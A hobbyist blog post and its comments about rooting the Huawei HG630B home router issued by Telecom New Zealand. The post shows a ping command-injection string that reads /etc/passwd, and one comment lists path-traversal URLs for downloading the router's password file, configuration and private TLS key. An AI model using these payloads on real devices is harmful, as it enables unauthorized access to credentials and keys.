Huawei HG630B. Got Root?

Huawei HG630B. Got Root?

Telecom New Zealand are distributing the Huawei HG630B router as their ‘Home Gateway’ for residential customers. These routers are particularly interesting as they are Tri-Purpose. They have three WAN interfaces: an RJ11 socket for ADSL/VDSL, Ethernet for Fibre and USB for a USB cellular modem.
Telecom have been distributing these routers since at least the start of 2014, so a number of them are out in the wild.

The Telecom (Huawei) HG630B

The Telecom (Huawei) HG630B


One thing to note is that these routers are heavily branded and heavily locked down….. AND they leave (at least) two external ports open on the WAN side.

The two ports open on the WAN side are 22 (SSH) and 443 (HTTPS). If you try to use port 22 or 443 as an incoming port, these ‘Admin’ ports are incremented (ie: Admin port 22 is changed to 23). It appears impossible to disable the Admin incoming ports through the web interface.

The only way to change this behaviour is to somehow get root access to the device.

I first attempted the tried and tested ping hack on the device. The ping hack is a classic command injection hack where the device simply takes whatever address you want to ping and executes it as “ping address>/var/pingresultfile”. Changing the address to “;cat /etc/passwd” runs the command “ping ;cat /etc/password>/var/pingresultfile” and Voila, you have access to run whatever you want at (normally) full root priveleges. This failed, it seems that Huawei take note of security reports and harden their software.

Maybe I need to take a look around inside..

Posted in Embedded Systems, General Randomness Tagged with:
9 comments on “Huawei HG630B. Got Root?
  1. Paul says:

    Is there a generic firmware that can be used to flash that away? Did you get any further

    • John says:

      I’m still investigating when I have the time.
      I am able to run commands as root, but not keen to divulge the vulnerability yet.

  2. Sam says:

    Oddly, we have this HG630B as well. We can administer via its web-based administrative interface on the LAN.
    We have a static ip and wanted to access the web-based interface via http but cant for the life of me see how to enable that. So far have created a port forward from port 8080 (start) port 8080 (end) then internal port 80. Oddly as described in you post above with incremental ports, if i went to ip.xx.xx.xx:8081 i got the login prompt which showed the username and password, but wouldnt let me in. Feels like im close, but have a feeling this is locked down in some respect.

  3. thefool says:

    Since you can open the firmware file as a filesystem , mount it rw, at say /routerupdate, then modify any system configuration etc save the changes and update the router with this firmware, restriction would be removed

  4. Mark says:

    Hi John… any progress here? I have just ordered one of these as a replacement for our antiquated DLINK. I’d like to know a bit more about gaining a little more control over the device.

  5. Jon says:

    Hi, Can you please let me know if you found a way to gain access to the device without jtagging?
    My device is a different model (HG658) but from the dump you posted it seems similar and the ping (and ftp) exploits don’t work on it.
    I just want to get the VOIP password my ISP has set on it because they won’t provide it. I’ve managed to get the rest of the details via hidden pages such as voip/vcesipbasicaccount.asp etc.
    Thanks

  6. Jamie Lennon says:

    Instead of having to backwards engineer the firmware have a look at these, I didn’t have much luck in decrypting the currentcfg file but maybe I’m lacking in skills. This router has a bug in the directory that allows you to download configuration files directly.

    http://192.168.1.254/images/…/…//…/…//etc/passwd
    http://192.168.1.254/images/…/…//…/…//config/currentcfg
    http://192.168.1.254/images/…/…//…/…//etc/t_tree.xml
    http://192.168.1.254/images/…/…//…/…//etc/serverkey.pem
    http://192.168.1.254/images/…/…//…/…//etc/servercert.pem
    http://192.168.1.254/images/…/…//…/…//etc/defaultcfg.xml
    http://192.168.1.254/images/…/…//…/…//lib/libcfmapi.so keys for currentcfg and defaultcfg are hidden here from what I can see. But I haven’t worked out how the encryption process is done, I think the web binary and the libcfmapi.so work together here.

  7. Jamie Lennon says:

    This guy knows his stuff, different router but the principal is the same http://pastebin.com/8DPdK3V6

Leave a Reply

Your email address will not be published. Required fields are marked *

*